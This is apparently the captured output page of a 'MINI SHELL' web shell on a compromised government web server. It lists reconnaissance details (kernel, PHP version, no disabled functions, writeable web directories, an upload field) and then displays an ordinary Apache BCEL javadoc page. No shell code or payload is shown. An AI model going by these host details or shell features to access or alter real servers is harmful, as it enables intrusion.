MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /usr/share/javadoc/bcel-5.1/org/apache/bcel/classfile/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/javadoc/bcel-5.1/org/apache/bcel/classfile/package-summary.html
<?xml version="1.0" encoding="US-ASCII"?>
<!DOCTYPE html PUBLIC "-//gnu.org///DTD XHTML 1.1 plus Target 1.0//EN" "../../../../resources/xhtml11-target10.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>org.apache.bcel.classfile (bcel API)</title><script src="../../../../resources/gjdoc.js" type="text/javascript"><!-- this comment required for konqueror 3.2.2 --></script><meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"/><meta name="generator" content="GNU Gjdoc Standard Doclet"/><meta name="keywords" content="org.apache.bcel.classfile packages"/><link rel="stylesheet" type="text/css" href="../../../../resources/gjdochtml-clean-layout.css" title="GNU Clean"/><link rel="stylesheet" type="text/css" href="../../../../resources/gjdochtml-clean-color1.css" title="GNU Clean"/></head><body class="content package" onload="if(parent.contentPageLoaded)parent.contentPageLoaded(document.title)"><table class="navbar div top"><tr><td class="navbar div top"><div class="navbar div top"><span class="navbar item enabled"><a href="../../../../overview-summary.html">Overview</a></span> <span class="navbar item active">Package</span> <span class="navbar item disabled">Class</span> <span class="navbar item disabled">Use</span> <span class="navbar item enabled"><a href="tree.html">Tree</a></span> <span class="navbar item enabled"><a href="../../../../alphaindex.html">Index</a></span> <span class="navbar item enabled"><a href="../../../../deprecated.html">Deprecated</a></span> <span class="navbar item enabled"><a href="../../../../about.html">About</a></span></div></td></tr><tr><td class="navi"><a href="../../../../org/apache/bcel/package-summary.html">Prev Package</a> | <a href="../../../../org/apache/bcel/generic/package-summary.html">Next Package</a></td><td class="navi"><a href="../../../../index.html" title="Show in a frameset" target="_top">Frames</a> | <a href="package-summary.html" title="Show without frames" target="_top">No Frames</a> </td></tr></table><h1 class="package title">Package org.apache.bcel.classfile</h1><div class="package description top">
This package contains the classes that describe the structure of a
Java class file and a class file parser.</div><dl class="table container"><dd><table class="package summary" border="1" width="100%"><tr class="table header"><td colspan="2"><h2 class="table header">Interface Summary</h2></td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/AttributeReader.html" title="Interface in org.apache.bcel.classfile">AttributeReader</a></td><td class="right"> Unknown (non-standard) attributes may be read via user-defined factory
 objects that can be registered with the Attribute.addAttributeReader
 method.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ConstantObject.html" title="Interface in org.apache.bcel.classfile">ConstantObject</a></td><td class="right"> This interface denotes those constants that have a "natural" value,
 such as ConstantLong, ConstantString, etc..</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/Node.html" title="Interface in org.apache.bcel.classfile">Node</a></td><td class="right"> Denote class to have an accept method();
</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/Visitor.html" title="Interface in org.apache.bcel.classfile">Visitor</a></td><td class="right"> Interface to make use of the Visitor pattern programming style.</td></tr></table></dd></dl>
<dl class="table container"><dd><table class="package summary" border="1" width="100%"><tr class="table header"><td colspan="2"><h2 class="table header">Class Summary</h2></td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/AccessFlags.html" title="Class in org.apache.bcel.classfile">AccessFlags</a></td><td class="right"> Super class for all objects that have modifiers like private, final, ...</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/Attribute.html" title="Class in org.apache.bcel.classfile">Attribute</a></td><td class="right"> Abstract super class for <em>Attribute</em> objects.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ClassFormatException.html" title="Class in org.apache.bcel.classfile">ClassFormatException</a></td><td class="right"> Thrown when the BCEL attempts to read a class file and determines
 that the file is malformed or otherwise cannot be interpreted as a
 class file.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ClassParser.html" title="Class in org.apache.bcel.classfile">ClassParser</a></td><td class="right"> Wrapper class that parses a given Java .class file.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/Code.html" title="Class in org.apache.bcel.classfile">Code</a></td><td class="right"> This class represents a chunk of Java byte code contained in a
 method.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/CodeException.html" title="Class in org.apache.bcel.classfile">CodeException</a></td><td class="right"> This class represents an entry in the exception table of the <em>Code</em>
 attribute and is used only there.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/Constant.html" title="Class in org.apache.bcel.classfile">Constant</a></td><td class="right"> Abstract superclass for classes to represent the different constant types
 in the constant pool of a class file.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ConstantClass.html" title="Class in org.apache.bcel.classfile">ConstantClass</a></td><td class="right"> This class is derived from the abstract 
 <a HREF="org.apache.bcel.classfile.Constant.html">Constant</a> class 
 and represents a reference to a (external) class.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ConstantCP.html" title="Class in org.apache.bcel.classfile">ConstantCP</a></td><td class="right"> Abstract super class for Fieldref and Methodref constants.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ConstantDouble.html" title="Class in org.apache.bcel.classfile">ConstantDouble</a></td><td class="right"> This class is derived from the abstract 
 <a HREF="org.apache.bcel.classfile.Constant.html">Constant</a> class 
 and represents a reference to a Double object.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ConstantFieldref.html" title="Class in org.apache.bcel.classfile">ConstantFieldref</a></td><td class="right"> This class represents a constant pool reference to a field.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ConstantFloat.html" title="Class in org.apache.bcel.classfile">ConstantFloat</a></td><td class="right"> This class is derived from the abstract 
 <a HREF="org.apache.bcel.classfile.Constant.html">Constant</a> class 
 and represents a reference to a float object.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ConstantInteger.html" title="Class in org.apache.bcel.classfile">ConstantInteger</a></td><td class="right"> This class is derived from the abstract 
 <a HREF="org.apache.bcel.classfile.Constant.html">Constant</a> class 
 and represents a reference to an int object.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ConstantInterfaceMethodref.html" title="Class in org.apache.bcel.classfile">ConstantInterfaceMethodref</a></td><td class="right"> This class represents a constant pool reference to an interface method.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ConstantLong.html" title="Class in org.apache.bcel.classfile">ConstantLong</a></td><td class="right"> This class is derived from the abstract 
 <a HREF="org.apache.bcel.classfile.Constant.html">Constant</a> class 
 and represents a reference to a long object.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ConstantMethodref.html" title="Class in org.apache.bcel.classfile">ConstantMethodref</a></td><td class="right"> This class represents a constant pool reference to a method.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ConstantNameAndType.html" title="Class in org.apache.bcel.classfile">ConstantNameAndType</a></td><td class="right"> This class is derived from the abstract 
 <a HREF="org.apache.bcel.classfile.Constant.html">Constant</a> class 
 and represents a reference to the name and signature
 of a field or method.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ConstantPool.html" title="Class in org.apache.bcel.classfile">ConstantPool</a></td><td class="right"> This class represents the constant pool, i.e., a table of constants, of
 a parsed classfile.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ConstantString.html" title="Class in org.apache.bcel.classfile">ConstantString</a></td><td class="right"> This class is derived from the abstract 
 <a HREF="org.apache.bcel.classfile.Constant.html">Constant</a> class 
 and represents a reference to a String object.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ConstantUtf8.html" title="Class in org.apache.bcel.classfile">ConstantUtf8</a></td><td class="right"> This class is derived from the abstract 
 <a HREF="org.apache.bcel.classfile.Constant.html">Constant</a> class 
 and represents a reference to a Utf8 encoded string.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ConstantValue.html" title="Class in org.apache.bcel.classfile">ConstantValue</a></td><td class="right"> This class is derived from <em>Attribute</em> and represents a constant 
 value, i.e., a default value for initializing a class field.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/Deprecated.html" title="Class in org.apache.bcel.classfile">Deprecated</a></td><td class="right"> This class is derived from <em>Attribute</em> and denotes that this is a
 deprecated method.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/DescendingVisitor.html" title="Class in org.apache.bcel.classfile">DescendingVisitor</a></td><td class="right"> Traverses a JavaClass with another Visitor object 'piggy-backed'
 that is applied to all components of a JavaClass object.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/EmptyVisitor.html" title="Class in org.apache.bcel.classfile">EmptyVisitor</a></td><td class="right"> Visitor with empty method bodies, can be extended and used in conjunction with the
 DescendingVisitor class, e.g.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/ExceptionTable.html" title="Class in org.apache.bcel.classfile">ExceptionTable</a></td><td class="right"> This class represents the table of exceptions that are thrown by a
 method.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/Field.html" title="Class in org.apache.bcel.classfile">Field</a></td><td class="right"> This class represents the field info structure, i.e., the representation 
 for a variable in the class.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/FieldOrMethod.html" title="Class in org.apache.bcel.classfile">FieldOrMethod</a></td><td class="right"> Abstract super class for fields and methods.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/InnerClass.html" title="Class in org.apache.bcel.classfile">InnerClass</a></td><td class="right"> This class represents a inner class attribute, i.e., the class
 indices of the inner and outer classes, the name and the attributes
 of the inner class.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/InnerClasses.html" title="Class in org.apache.bcel.classfile">InnerClasses</a></td><td class="right"> This class is derived from <em>Attribute</em> and denotes that this class
 is an Inner class of another.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/JavaClass.html" title="Class in org.apache.bcel.classfile">JavaClass</a></td><td class="right"> Represents a Java class, i.e., the data structures, constant pool,
 fields, methods and commands contained in a Java .class file.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/LineNumber.html" title="Class in org.apache.bcel.classfile">LineNumber</a></td><td class="right"> This class represents a (PC offset, line number) pair, i.e., a line number in
 the source that corresponds to a relative address in the byte code.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/LineNumberTable.html" title="Class in org.apache.bcel.classfile">LineNumberTable</a></td><td class="right"> This class represents a table of line numbers for debugging
 purposes.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/LocalVariable.html" title="Class in org.apache.bcel.classfile">LocalVariable</a></td><td class="right"> This class represents a local variable within a method.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/LocalVariableTable.html" title="Class in org.apache.bcel.classfile">LocalVariableTable</a></td><td class="right"> This class represents colection of local variables in a
 method.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/Method.html" title="Class in org.apache.bcel.classfile">Method</a></td><td class="right"> This class represents the method info structure, i.e., the representation 
 for a method in the class.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/PMGClass.html" title="Class in org.apache.bcel.classfile">PMGClass</a></td><td class="right"> This class is derived from <em>Attribute</em> and represents a reference
 to a <a href="http://www.inf.fu-berlin.de/~bokowski/pmgjava/index.html">PMG</a>
 attribute.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/Signature.html" title="Class in org.apache.bcel.classfile">Signature</a></td><td class="right"> This class is derived from <em>Attribute</em> and represents a reference
 to a <href="http://wwwipd.ira.uka.de/~pizza/gj/">GJ attribute.</href="http://wwwipd.ira.uka.de/~pizza/gj/"></td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/SourceFile.html" title="Class in org.apache.bcel.classfile">SourceFile</a></td><td class="right"> This class is derived from <em>Attribute</em> and represents a reference
 to the source file of this class.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/StackMap.html" title="Class in org.apache.bcel.classfile">StackMap</a></td><td class="right"> This class represents a stack map attribute used for
 preverification of Java classes for the <a href="http://java.sun.com/j2me/"> Java 2 Micro Edition</a>
 (J2ME).</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/StackMapEntry.html" title="Class in org.apache.bcel.classfile">StackMapEntry</a></td><td class="right"> This class represents a stack map entry recording the types of
 local variables and the the of stack items at a given byte code offset.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/StackMapType.html" title="Class in org.apache.bcel.classfile">StackMapType</a></td><td class="right"> This class represents the type of a local variable or item on stack
 used in the StackMap entries.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/Synthetic.html" title="Class in org.apache.bcel.classfile">Synthetic</a></td><td class="right"> This class is derived from <em>Attribute</em> and declares this class as
 `synthetic', i.e., it needs special handling.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/Unknown.html" title="Class in org.apache.bcel.classfile">Unknown</a></td><td class="right"> This class represents a reference to an unknown (i.e.,
 application-specific) attribute of a class.</td></tr><tr><td class="left"><a href="../../../../org/apache/bcel/classfile/Utility.html" title="Class in org.apache.bcel.classfile">Utility</a></td><td class="right"> Utility functions that do not really belong to any class in particular.</td></tr></table></dd></dl>
<a name="description" id="description"/><div class="package description full">
This package contains the classes that describe the structure of a
Java class file and a class file parser.
</div><p class="navbar bottom spacer"> </p><table class="navbar div bottom"><tr><td><div class="navbar div top"><span class="navbar item enabled"><a href="../../../../overview-summary.html">Overview</a></span> <span class="navbar item active">Package</span> <span class="navbar item disabled">Class</span> <span class="navbar item disabled">Use</span> <span class="navbar item enabled"><a href="tree.html">Tree</a></span> <span class="navbar item enabled"><a href="../../../../alphaindex.html">Index</a></span> <span class="navbar item enabled"><a href="../../../../deprecated.html">Deprecated</a></span> <span class="navbar item enabled"><a href="../../../../about.html">About</a></span></div></td></tr></table></body></html>

Anon7 - 2021